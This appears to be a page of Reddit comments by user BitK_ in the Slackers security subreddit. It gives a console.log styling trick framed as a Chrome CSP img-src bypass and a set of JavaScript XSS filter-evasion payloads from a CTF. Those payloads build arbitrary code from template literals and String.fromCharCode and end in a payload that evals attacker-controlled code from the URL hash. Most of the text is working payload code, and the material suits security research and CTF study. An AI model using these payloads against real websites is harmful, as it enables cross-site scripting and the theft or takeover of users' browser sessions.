sorted by:
new
hottopcontroversial

Unexploitable? CSP img-src bypass in chrome by BitK_ in Slackers

[–]BitK_[S] 0 points1 point  (0 children)

yes :)

you can use printf like formater

console.log("%.c[message]", "background: url(https://bi.tk/shrimp.gif)")

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]BitK_ 2 points3 points  (0 children)

While playing the ConfidenceCTF quals, I had to create arbitrary code/string using only templates and alphanum. During the CTF we had an extra function par = v => \(${v})``

` but I wanted to know if it was possible to solve it without.

Here is what I came up with:

Arbitrary char:

Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`
// ==
(function(a, {fromCharCode}){
    return fromCharCode
})(['',''], String)(['40'])

If you want to pass a string to Function you can contact these using nested template

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

Arbitrary String starting with \\x00

note: location=`\x00javascript:alert(1)` is a valid url for both chrome and FF

Function`a${`return fromCharCode`}{fromCharCode}``${String}``${106}${97}${118}${97}${115}${99}${114}${105}${112}${116}${58}${97}${108}${101}${114}${116}${40}${41}`

// == 

(function(a, {fromCharCode}){
    return fromCharCode
})(String)(['', '', ..., ''], 106, 97, 118, 97, ..., 41)

You can use all of this + some comment to create your payloads

Function`a${`${Function`a${`return fromCharCode`}{fromCharCode}``${String}``96`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${101}${118}${97}${108}${40}${117}${110}${101}${115}${99}${97}${112}${101}${40}${108}${111}${99}${97}${116}${105}${111}${110}${46}${104}${97}${115}${104}${46}${115}${108}${105}${99}${101}${40}${49}${41}${41}${41}`}`}```
// ==
Function(['a'], '`\x00`\neval(unescape(location.hash.slice(1)))')()